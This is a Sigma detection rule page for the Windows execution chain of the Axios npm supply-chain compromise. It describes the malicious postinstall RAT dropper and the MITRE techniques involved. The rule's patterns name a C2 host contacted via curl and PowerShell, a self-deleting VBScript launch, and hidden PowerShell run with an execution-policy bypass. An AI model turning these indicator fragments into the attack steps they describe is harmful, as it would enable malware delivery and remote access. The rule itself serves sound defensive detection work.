Detection rules › Sigma
Axios NPM Compromise Indicators - Windows
Detects the specific Windows execution chain and process tree associated with the Axios NPM supply chain compromise. On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency (plain-crypto-js@4.2.1) that executed a postinstall script as a cross-platform RAT dropper. The dropper contacted a C2 server, delivered platform-specific payloads, deleted itself, and replaced package.json to evade detection. The attack used cscript.exe (VBScript), curl.exe (C2), and PowerShell masquerading as Windows Terminal.
MITRE ATT&CK coverage
| Tactic | Techniques |
|---|---|
| Initial Access | T1195.002 Supply Chain Compromise: Compromise Software Supply Chain |
| Execution | T1059.003 Command and Scripting Interpreter: Windows Command Shell, T1059.005 Command and Scripting Interpreter: Visual Basic |
| Command & Control | T1105 Ingress Tool Transfer |
Event coverage
| Provider | Event | Title |
|---|---|---|
| Sysmon | Event ID 1 | Process creation |
Rule body yaml
title: Axios NPM Compromise Indicators - Windows
id: f6c27ecc-d890-4452-80e6-2e274a10e097
status: experimental
description: |
Detects the specific Windows execution chain and process tree associated with the Axios NPM supply chain compromise.
On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency (plain-crypto-js@4.2.1) that executed a postinstall script as a cross-platform RAT dropper.
The dropper contacted a C2 server, delivered platform-specific payloads, deleted itself, and replaced package.json to evade detection.
The attack used cscript.exe (VBScript), curl.exe (C2), and PowerShell masquerading as Windows Terminal.
references:
- https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan
- https://thehackernews.com/2026/03/axios-supply-chain-attack-pushes-cross.html?m=1
- https://www.derp.ca/research/axios-npm-supply-chain-rat/
- https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections
- https://www.virustotal.com/gui/file/e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-04-01
tags:
- attack.initial-access
- attack.t1195.002
- attack.execution
- attack.command-and-control
- attack.t1059.003
- attack.t1059.005
- attack.t1105
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_cscript:
ParentImage|endswith:
- '\node.exe'
- '\bun.exe'
Image|endswith: '\cmd.exe'
CommandLine|contains|all:
- 'cscript'
- 'AppData\Local\Temp'
- '//nologo && del'
- '6202033.vbs'
selection_curl:
Image|endswith:
- '\curl.exe'
- '\powershell.exe'
CommandLine|contains: 'http://sfrclak.com'
selection_susp_cli:
OriginalFileName: 'PowerShell.EXE'
CommandLine|contains: '"C:\ProgramData\wt.exe" -w hidden -ep bypass -file'
condition: 1 of selection_*
falsepositives:
- Highly unlikely
level: high
Stages and Predicates
Stage 0: condition
1 of selection_*Stage 1: selection_cscript
selection_cscript:
ParentImage|endswith:
- '\node.exe'
- '\bun.exe'
Image|endswith: '\cmd.exe'
CommandLine|contains|all:
- 'cscript'
- 'AppData\Local\Temp'
- '//nologo && del'
- '6202033.vbs'
Stage 2: selection_curl
selection_curl:
Image|endswith:
- '\curl.exe'
- '\powershell.exe'
CommandLine|contains: 'http://sfrclak.com'
Stage 3: selection_susp_cli
selection_susp_cli:
OriginalFileName: 'PowerShell.EXE'
CommandLine|contains: '"C:\ProgramData\wt.exe" -w hidden -ep bypass -file'
Indicators
Each row is a field, operator, and value that the rule matches. The corpus column counts how many other rules in the catalog look for the same combination: high numbers point to widely-used, community-vetted indicators. Blank or 1 shows that the indicator is specific to this rule.
| Field | Kind | Values |
|---|---|---|
CommandLine | match |
|
Image | ends_with |
|
OriginalFileName | eq |
|
ParentImage | ends_with |
|